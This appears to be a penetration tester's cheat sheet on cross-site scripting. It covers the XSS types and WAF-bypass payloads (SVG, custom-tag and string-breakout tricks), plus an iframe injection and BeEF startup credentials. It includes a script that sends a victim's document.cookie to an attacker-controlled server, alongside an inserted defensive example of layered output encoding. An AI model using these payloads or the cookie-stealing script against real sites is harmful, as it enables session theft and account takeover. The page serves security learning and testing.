Cross site scripting (XSS)
Cross-site scripting is a type of computer security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
-- Wikipedia
Types of XSS
Reflected (non-persistent)
JavaScript code sent in a request, e.g. via query parameters or form data, is echoed back in the response without proper encoding.
E.g.:
https://domain.com/?error=<script>alert(1)</script>
To reach victims you need an external delivery mechanism, e.g. an email, a tweet or another message carrying the link.
Stored (persistent)
JavaScript code gets stored on the server and is later displayed to other users without proper encoding.
Entry points:
URL query string
Message body
Request headers
Any out-of-band routes
Exit points:
All possible HTTP responses
-> Try to find links between entry and exit points.
E.g.:
Use <script>alert(1)</script>
as username, in a comment post, etc.
Via img: <img src="." onerror="alert('test');" />
Via URL: <a href="javascript:alert('test')">test</a>
As your payload is stored on the server, you don't need an external delivery mechanism (as for reflected XSS); therefore stored XSS is generally considered the more severe vulnerability.
DOM-based (client-side code)
The attacker gets control over JavaScript variables that are written to the DOM or passed to methods like eval() or innerHTML.
HTML sinks
Place random alphanumeric strings into the source (e.g. location.search) and inspect the DOM using the browser's developer tools to see where and how they end up.
JS sinks
Using the browser's developer tools you can follow your input through the JavaScript code and check if/how it reaches a sink.
See also PortSwigger - Web Security Academy - Which sinks can lead to DOM-XSS vulnerabilities?
jQuery
Sinks:
attr()
$()
AngularJS
Check for the ng-app attribute, then use {{...}} expressions to inject JavaScript.
Blind
Similar to stored XSS, but you won't see the output/impact directly, e.g. when submitting a contact form containing an XSS payload.
Bypass WAF
Tags and events
Use "Copy tags to clipboard" and "Copy events to clipboard" from PortSwigger - XSS Cheat Sheet to detect unfiltered tags and events (e.g. using Burp Intruder).
Custom tag
Trigger XSS using custom HTML tags. The #blub URL fragment focuses the element with that id, which fires the onfocus handler:
<bla id=blub onfocus=alert(1) tabindex=1>#blub
SVG tag
Using the animation onbegin event:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><rect><animateTransform onbegin="alert(1)" /></rect></svg>
Using the SVG animate tag to set the href attribute of an anchor tag:
<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me!</text></a></svg>
Break out JS string
E.g. using:
'-alert(1)-'
';alert(1)//'
HTML encoding
An HTML-encoded single quote (') gets decoded by the HTML parser first and is then executed when used in event handlers like onclick.
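The decode-then-execute order above is why HTML encoding alone does not protect data placed inside an inline handler. As an added example (not code from the original page), the following JavaScript models the two parsing stages for an assumed template <button onclick="show('USER_DATA')">, and shows the page's own breakout payload '-alert(1)-' escaping the string literal when only HTML-encoded, but not when JS-string-encoded first:

```javascript
// Added example (not from the page). Assumed template: <button onclick="show('USER_DATA')">.
// The HTML parser decodes character references in the attribute first; only then does
// the JS engine parse the result, so the encoding must match both layers.
// Minimal decoder for the character references used here (a browser decodes many more).
function decodeHtmlEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|(amp|lt|gt|quot|apos));/gi, (_, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    return { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" }[name.toLowerCase()];
  });
}

// HTML encoding: right for text nodes, insufficient on its own inside a JS string literal.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// JS string-literal encoding: every non-alphanumeric character becomes \xHH or \uHHHH,
// so no quote, backslash or bracket survives to the JS parser.
function encodeForJsString(s) {
  return Array.from(s, ch => {
    if (/[A-Za-z0-9]/.test(ch)) return ch;
    const hex = ch.codePointAt(0).toString(16);
    return hex.length <= 2 ? '\\x' + hex.padStart(2, '0') : '\\u' + hex.padStart(4, '0');
  }).join('');
}

// Correct layering: encode for the inner context (JS string) first, then the outer one (HTML).
const encodeForJsInHtmlAttr = s => encodeForHtml(encodeForJsString(s));

// The JS source the engine actually executes once the HTML parser has decoded the attribute.
function handlerSource(userData, encoder) {
  return decodeHtmlEntities(`show('${encoder(userData)}')`);
}

// Count single quotes not preceded by a backslash; the template expects exactly two.
function unescapedQuoteCount(src) {
  let n = 0;
  for (let i = 0; i < src.length; i++) {
    if (src[i] === '\\') { i++; continue; }
    if (src[i] === "'") n++;
  }
  return n;
}

// true when the data broke out of the string literal, i.e. the injected code would run.
function breaksOutOfString(userData, encoder) {
  return unescapedQuoteCount(handlerSource(userData, encoder)) !== 2;
}
```

The same layering applies to any nested context: encode for the innermost parser first and the outermost last, never just once.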
Template literals
Template literals are encapsulated in backticks, and the ${...} syntax evaluates JavaScript inside them.
document.getElementById('message').innerText = `user controllable data`; // inject e.g. ${alert(1)}
Polyglots
Iframe injection
<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>
Stealing cookies & sessions
Make the victim's browser request an image from your server, sending their cookie as a GET parameter.
<script>
new Image().src="https://<your-server>?cookie="+document.cookie;
</script>
BeEF
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF - The Browser Exploitation Framework Project
Start ./beef
Username: beef
Password: beef